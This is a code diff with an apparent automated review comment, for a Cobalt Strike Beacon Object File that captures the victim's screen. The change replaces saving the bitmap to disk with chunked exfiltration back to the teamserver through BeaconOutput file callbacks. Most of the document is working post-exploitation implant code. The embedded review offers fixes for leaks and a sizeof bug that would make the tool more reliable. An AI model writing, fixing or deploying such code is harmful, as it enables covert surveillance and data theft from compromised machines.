skipped 4 lines 5 5 #pragma comment(lib, "User32.lib") 6 6 #pragma comment(lib, "Gdi32.lib") 7 7 8 + char downloadfilename[] = "screenshot.bmp"; 9 + /*Download File*/ 10 + void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) { 8 11 12 + //Intializes random number generator to create fileId 13 + time_t t; 14 + MSVCRT$srand((unsigned)MSVCRT$time(&t)); 15 + int fileId = MSVCRT$rand(); 16 + 17 + //8 bytes for fileId and fileSize 18 + int messageLength = downloadFileNameLength + 8; 19 + char* packedData = (char*)MSVCRT$malloc(messageLength); 20 + 21 + //pack on fileId as 4-byte int first 22 + packedData[0] = (fileId >> 24) & 0xFF; 23 + packedData[1] = (fileId >> 16) & 0xFF; 24 + packedData[2] = (fileId >> 8) & 0xFF; 25 + packedData[3] = fileId & 0xFF; 26 + 27 + //pack on fileSize as 4-byte int second 28 + packedData[4] = (fileSize >> 24) & 0xFF; 29 + packedData[5] = (fileSize >> 16) & 0xFF; 30 + packedData[6] = (fileSize >> 8) & 0xFF; 31 + packedData[7] = fileSize & 0xFF; 32 + 33 + int packedIndex = 8; 34 + 35 + //pack on the file name last 36 + for (int i = 0; i < downloadFileNameLength; i++) { 37 + packedData[packedIndex] = fileName[i]; 38 + packedIndex++; 39 + } 40 + 41 + BeaconOutput(CALLBACK_FILE, packedData, messageLength); 42 + 43 + if (fileSize > (1024 * 900)) { 44 + 45 + //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk) 46 + int numOfChunks = (fileSize / (1024 * 900)) + 1; 47 + int index = 0; 48 + int chunkSize = 1024 * 900; 49 + 50 + while (index < fileSize) { 51 + if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on 52 + 53 + /*First 4 are the fileId 54 + then account for length of file 55 + then a byte for the good-measure null byte to be included 56 + then lastly is the 4-byte int of the fileSize*/ 57 + int chunkLength = 4 + chunkSize; 58 + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); 
59 + 60 + //pack on fileId as 4-byte int first 61 + packedChunk[0] = (fileId >> 24) & 0xFF; 62 + packedChunk[1] = (fileId >> 16) & 0xFF; 63 + packedChunk[2] = (fileId >> 8) & 0xFF; 64 + packedChunk[3] = fileId & 0xFF; 65 + 66 + int chunkIndex = 4; 67 + 68 + //pack on the file name last 69 + for (int i = index; i < index + chunkSize; i++) { 70 + packedChunk[chunkIndex] = returnData[i]; 71 + chunkIndex++; 72 + } 73 + 74 + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 75 + 76 + } 77 + else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements 78 + 79 + int lastChunkLength = fileSize - index + 4; 80 + char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength); 81 + 82 + //pack on fileId as 4-byte int first 83 + lastChunk[0] = (fileId >> 24) & 0xFF; 84 + lastChunk[1] = (fileId >> 16) & 0xFF; 85 + lastChunk[2] = (fileId >> 8) & 0xFF; 86 + lastChunk[3] = fileId & 0xFF; 87 + int lastChunkIndex = 4; 88 + 89 + //pack on the file name last 90 + for (int i = index; i < fileSize; i++) { 91 + lastChunk[lastChunkIndex] = returnData[i]; 92 + lastChunkIndex++; 93 + } 94 + BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); 95 + } 96 + 97 + index = index + chunkSize; 98 + 99 + } 100 + 101 + } 102 + else { 103 + 104 + /*first 4 are the fileId 105 + then account for length of file 106 + then a byte for the good-measure null byte to be included 107 + then lastly is the 4-byte int of the fileSize*/ 108 + int chunkLength = 4 + fileSize; 109 + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); 110 + 111 + //pack on fileId as 4-byte int first 112 + packedChunk[0] = (fileId >> 24) & 0xFF; 113 + packedChunk[1] = (fileId >> 16) & 0xFF; 114 + packedChunk[2] = (fileId >> 8) & 0xFF; 115 + packedChunk[3] = fileId & 0xFF; 116 + int chunkIndex = 4; 117 + 118 + //pack on the file name last 119 + for (int i = 0; i < fileSize; i++) { 120 + packedChunk[chunkIndex] = returnData[i]; 121 + chunkIndex++; 122 + } 123 + 124 + 
BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 125 + } 126 + 127 + 128 + //We need to tell the teamserver that we are done writing to this fileId 129 + char packedClose[4]; 130 + 131 + //pack on fileId as 4-byte int first 132 + packedClose[0] = (fileId >> 24) & 0xFF; 133 + packedClose[1] = (fileId >> 16) & 0xFF; 134 + packedClose[2] = (fileId >> 8) & 0xFF; 135 + packedClose[3] = fileId & 0xFF; 136 + BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4); 137 + 138 + return; 139 + } 9 140 10 141 #pragma region error_handling 11 142 #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) skipped 68 lines 80 211 ReleaseDC(NULL, hDC); 81 212 } 82 213 83 - fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 84 - FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); 214 + / / fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN , NULL ) ; 85 215 86 - if (fh == INVALID_HANDLE_VALUE) 87 - return FALSE; 216 + / / if (fh == INVALID_HANDLE_VALUE) 217 + / / return FALSE; 88 218 89 219 bmfHdr.bfType = 0x4D42; // "BM" 90 220 dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; skipped 1 lines 92 222 bmfHdr.bfReserved1 = 0; 93 223 bmfHdr.bfReserved2 = 0; 94 224 bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; 225 + void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize); 226 + memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER)); 227 + memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize); 95 228 96 - WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); 97 229 98 - WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); 230 + downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize)); 231 + //WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL); 
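Review bot: Every `MSVCRT$malloc` in `downloadFile` is unchecked and none of the buffers (`packedData`, `packedChunk`, `lastChunk`) is released after its `BeaconOutput` call, so each invocation leaks the whole packed payload (up to the 900 KB chunk size per iteration) inside the host process, and a failed allocation is written through as a NULL pointer. Add a NULL check after each allocation and a matching `free` (via the same `MSVCRT$` import convention the file already uses) right after the corresponding `BeaconOutput`; `numOfChunks` is computed but never read and can be dropped. The same four-line fileId big-endian packing is repeated five times and the chunk-loop comments say "pack on the file name" where the loops actually copy `returnData`, so a small `static void pack_u32(char *dst, int v)` helper would remove both the duplication and the misleading comments. The caller at line 230 passes `sizeof(lpszFileName)`, which is the width of the pointer rather than the length of the name, so `downloadFileNameLength` is always 4 or 8 and the packed header carries a truncated name; the string length is what the header needs. `bmpdata` at line 225 has the same unchecked-and-never-freed problem.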
232 + 233 + /* clean up */ 99 234 GlobalUnlock(hDib); 100 235 GlobalFree(hDib); 101 - CloseHandle(fh); 236 + / / CloseHandle(fh); 102 237 return TRUE; 103 238 } 104 239 105 240 #ifdef BOF 106 241 void go(char* buff, int len) { 107 - BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); 242 + datap parser; 243 + char * downloadfilename; 244 + BeaconDataParse(&parser, buff, len); 245 + downloadfilename = BeaconDataExtract(&parser, NULL); 246 + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename); 108 247 int x1, y1, x2, y2, w, h; 109 248 // get screen dimensions 110 249 x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); skipped 21 lines 132 271 */ 133 272 134 273 BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); 135 - LPCSTR filename = "screenshot.bmp"; 274 + LPCSTR filename = (LPCSTR)downloadfilename; 136 275 SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); 137 276 138 - BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot . bmp "); 277 + / / BeaconPrintf(0x0, "[+] Printscreen bitmap saved to % s ", downloadfilename ); 139 278 // clean up 140 279 SelectObject(hDC, old_obj); 141 280 DeleteDC(hDC); skipped 12 lines